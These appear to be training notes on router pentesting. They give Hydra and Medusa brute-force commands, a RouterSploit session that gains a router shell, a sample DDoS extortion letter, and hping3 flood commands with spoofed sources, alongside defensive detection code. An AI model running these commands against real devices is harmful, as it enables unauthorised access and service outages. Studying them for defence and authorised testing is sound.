Router Pentesting
=================
Database
Web Applications
Desktops
Servers
Web Sites
Routers
Three Different Types of Scenario
=================================
1. People purchase routers and do not change the interface's credentials
Default Username
Default Passwords
admin:password
admin:admin
admin:null
1. Physical access to the router
It is stuck to the bottom of my router.
2. I can use open-source web sites to look up default credentials
Which company made the router?
#route -n ---> it will tell me the default gateway
192.168.0.1
I will enter that IP Address in the browser
https://www.bestvpn.com/default-router-login-details/
http://192-168-1-1ip.mobi/default-router-passwords-list/
http://www.routerpasswords.com/
2. When people become a little smarter, they change the router's credentials
Sometimes we know the router's username, but the password is still unknown to us.
Brute Force
===========
1. Hydra
2. Medusa
1. Hydra -->
One of the best tools for performing brute-force attacks against many different services and protocols.
FTP
SSH
Telnet
Any protocol that requires authentication (user id | password)
http
I know that
username --> Admin
password --> ?
I will tell Hydra that the username is Admin
password --> brute force
#hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
Hydra reports 16 valid entries; one of them will be my password.
2. Medusa
=========
I am faster and more reliable than Hydra; I work in parallel and can process more passwords than Hydra.
I give more accurate credentials --> exactly one username and password
Hydra supports a limited number of modules, but Medusa supports a huge variety of modules
modules ---> Protocols
#medusa -h 192.168.0.1 -u Admin -P /usr/share/wordlists/rockyou.txt -e n -M http
success message ---> Username:Admin Password: **********
3. Those who are very smart change both the username and the password.
1. hydra -L /usr/share/wordlists/rockyou.txt (username list instead of -l)
2. medusa -U /usr/share/wordlists/rockyou.txt (username list instead of -u)
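From the defender's side, scenarios 2 and 3 above look different in the router's login log: a single username with many failures versus many usernames tried from one address. The following added example (not part of these notes) flags both patterns with a sliding window per source IP; the log format, thresholds and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of router web-interface login events (not from a real device).
# .23 = scenario 2 (username known), .7 = legitimate admin, .99 = scenario 3 (usernames guessed)
SAMPLE_LOG = """\
2024-01-01T10:00:01 login src=192.168.0.23 user=admin result=fail
2024-01-01T10:00:02 login src=192.168.0.23 user=admin result=fail
2024-01-01T10:00:02 login src=192.168.0.23 user=admin result=fail
2024-01-01T10:00:03 login src=192.168.0.23 user=admin result=fail
2024-01-01T10:00:03 login src=192.168.0.23 user=admin result=fail
2024-01-01T10:00:04 login src=192.168.0.23 user=admin result=success
2024-01-01T10:05:00 login src=192.168.0.7 user=admin result=fail
2024-01-01T10:05:30 login src=192.168.0.7 user=admin result=success
2024-01-01T11:00:00 login src=192.168.0.99 user=root result=fail
2024-01-01T11:00:00 login src=192.168.0.99 user=support result=fail
2024-01-01T11:00:01 login src=192.168.0.99 user=user result=fail
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) login src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$"
)

def parse(log_text):
    # Yield (timestamp, src, user, result); malformed lines are skipped.
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]

def detect(log_text, window=timedelta(seconds=60), max_fail=5, max_users=3):
    """Return {src_ip: set_of_alerts} using a sliding window of failures per source.
    password_bruteforce      : >= max_fail failures inside `window` (hydra -l / medusa -u)
    username_guessing        : >= max_users distinct usernames inside `window` (-L / -U)
    success_after_bruteforce : a login succeeded from a source already flagged
    """
    recent = defaultdict(deque)   # src -> failures (ts, user) still inside the window
    alerts = defaultdict(set)
    for ts, src, user, result in parse(log_text):
        q = recent[src]
        while q and ts - q[0][0] > window: q.popleft()   # expire old failures
        if result == "fail":
            q.append((ts, user))
            if len(q) >= max_fail:
                alerts[src].add("password_bruteforce")
            if len({u for _, u in q}) >= max_users:
                alerts[src].add("username_guessing")
        elif result == "success" and src in alerts:
            alerts[src].add("success_after_bruteforce")
    return dict(alerts)
```

The legitimate admin who mistyped once produces no alert, while a success that follows a flagged burst is the event worth paging on.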
Router Exploitation Framework ---> routersploit framework
=========================================================
google --> routersploit framework github
https://github.com/reverse-shell/routersploit
click on "Download or clone" --> copy the link
https://github.com/reverse-shell/routersploit.git
Open the terminal
#git clone https://github.com/reverse-shell/routersploit.git
RouterSploit will be downloaded to your Linux operating system
#cd routersploit
#ls ---> rsf.py --> executable file
root@kali:~/tools/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
IoT Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version : 2.2.1
Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10
rsf >
rsf > help
Global commands:
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit
rsf > use
creds exploits payloads scanners
rsf > use scanners/
scanners/2wire_scan scanners/cameras_scan scanners/juniper_scan scanners/routers_scan
scanners/3com_scan scanners/cisco_scan scanners/linksys_scan scanners/shuttle_scan
scanners/asmax_scan scanners/comtrend_scan scanners/misc_scan scanners/technicolor_scan
scanners/asus_scan scanners/dlink_scan scanners/movistar_scan scanners/thomson_scan
scanners/autopwn scanners/fortinet_scan scanners/multi_scan scanners/tplink_scan
scanners/belkin_scan scanners/grandstream_scan scanners/netcore_scan scanners/ubiquiti_scan
scanners/bhu_scan scanners/huawei_scan scanners/netgear_scan scanners/zte_scan
scanners/billion_scan scanners/ipfire_scan scanners/netsys_scan scanners/zyxel_scan
rsf > use scanners/autopwn
rsf (AutoPwn) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IP address e.g. 192.168.1.1
port 80 Target port
Module options:
Name Current settings Description
---- ---------------- -----------
threads 8 Number of threads
rsf (AutoPwn) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (AutoPwn) >
back check exec exit help run search set setg show use
rsf (AutoPwn) > run
[*] Could not verify exploitability: --> blue
- exploits/routers/billion/5200w_rce
- exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- exploits/routers/dlink/dsl_2640b_dns_change
- exploits/routers/dlink/dsl_2740r_dns_change
- exploits/routers/dlink/dir_815_850l_rce
- exploits/routers/shuttle/915wm_dns_change
- exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- exploits/routers/cisco/secure_acs_bypass
- exploits/routers/cisco/catalyst_2960_rocem
[+] Device is vulnerable: --> green
- exploits/routers/dlink/multi_hnap_rce
rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
port 80 Target Port
rsf (D-Link Multi HNAP RCE) > set target http://192.168.0.1
[+] {'target': 'http://192.168.0.1'}
rsf (D-Link Multi HNAP RCE) > run
cmd> --> shell of the router
Organisation ----> cisco routers
MS --> Windows
Linux --> Red Hat|fedora|Ubuntu
Router --> IOS
iOS
IOS --> Interconnection Operating system
Cisco Packet Tracer ---> simulator for routers and switches (Network Administrator, CCNA)
Harm that can be caused through the router's shell
--------------------------------------------------
Implant Backdoor
Port Forwarding
Authentication Changing
Block MAC Addresses --> MAC Filtering
Network Traffic Monitoring
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DoS Attack
----------
It is the type of attack in which a single user sends multiple requests to a host. In other words, a user creates a huge amount of traffic towards the host server. It may lead to the system crashing, which further leads to system failure or makes the system unavailable for some time.
www.amazon.com ---> I deployed a DoS attack ----> which means the server will start getting slow.
Users will get frustrated and will go and purchase items from Amazon's competitors.
Hello Sir,
I have a botnet of 10,000 devices. It is a humble request that you pay me $50,000 USD, or else I will deploy a DoS|DDoS attack on your server.
Bitcoin account number ----> ************
With Love
Attacker
Hello Attacker,
Please do not deploy any such attack. We are ready to pay you the specific amount of money ASAP.
Size --> greater than xxx
Data is coming from a single IP address
It is sending traffic continuously
Block that IP address
DDoS --> Distributed Denial Of Service
======================================
It is a kind of DoS attack in which there are many machines, each sending data from its own device to the target machine.
hping3
======
A network tool which is used for:
Testing firewall
Testing TCP/IP connection
Testing IDS and IPS
Scanning open ports
It is also used for generating traffic over the network
hping3 172.16.226.143 --flood --rand-source -c 500000 -d 12000 -p 8080
hping3 --> tool
172.16.226.143 --> target IP Address
--flood --> to send packets continuously
--rand-source --> to give the source IP Address as random source
-c --> count ---> how many packets we need to send
-d --> size ---> size of one packet
-p --> port number
hping3 172.16.226.143 --flood --rand-source -c 500000 -d 12000 -p 443
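The DoS notes above say to block a single source that keeps sending large traffic, but --rand-source spreads the same flood over spoofed addresses, so a per-IP block no longer helps and the defence has to move to the port or upstream. The following added example (not part of these notes; packet records, thresholds and the bucket interval are constructed assumptions) applies both checks to one-second buckets of packet summaries and returns only the IPs that are actually worth blocking.

```python
from collections import Counter, defaultdict

# Constructed packet summaries (ts_seconds, src_ip, dst_port, bytes); not a real capture.
SAMPLE_PACKETS = (
    # 200 large packets in one second from one host: the single-source DoS case
    [(t * 0.005, "10.0.0.5", 8080, 12000) for t in range(200)]
    # normal traffic: a couple of large packets per second from LAN clients
    + [(5 + t * 0.5, "192.168.0.%d" % (t % 20 + 2), 80, 1500) for t in range(20)]
    # 400 large packets over two seconds from 250 spoofed sources (--rand-source style)
    + [(10 + t * 0.005, "203.0.113.%d" % (t % 250 + 1), 443, 12000) for t in range(400)]
)

def bucket(packets, interval=1.0):
    """Group packets into fixed time buckets: {bucket_index: [(src, port, size), ...]}."""
    buckets = defaultdict(list)
    for ts, src, port, size in packets:
        buckets[int(ts // interval)].append((src, port, size))
    return buckets

def analyse(packets, interval=1.0, pps_limit=100, min_size=1000):
    """Return [(bucket, kind, detail)] findings for floods of large packets.
    single_source: one IP alone exceeds pps_limit towards a port -> block that IP
    distributed:   the port exceeds pps_limit but no single IP does -> per-IP blocks
                   cannot help; rate-limit the port or filter upstream instead
    """
    findings = []
    for b, pkts in sorted(bucket(packets, interval).items()):
        per_port = defaultdict(Counter)          # port -> Counter(src -> packets)
        for src, port, size in pkts:
            if size >= min_size:                 # the "size greater than xxx" check
                per_port[port][src] += 1
        for port, srcs in sorted(per_port.items()):
            top_src, top_n = srcs.most_common(1)[0]
            if top_n > pps_limit:                # "data from a single IP, continuously"
                findings.append((b, "single_source", top_src))
            elif sum(srcs.values()) > pps_limit: # many sources, none dominant: DDoS
                findings.append((b, "distributed", port))
    return findings

def blocklist(findings):
    """IPs worth blocking: only single-source offenders, never the spoofed ones."""
    return sorted({d for _, kind, d in findings if kind == "single_source"})
```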
Read
====
There are 4 different types of authentication
1. Basic Authentication
2. Integrated Authentication
3. Digest Authentication
4. Form Based Authentication
Task --> implement Medusa against your own router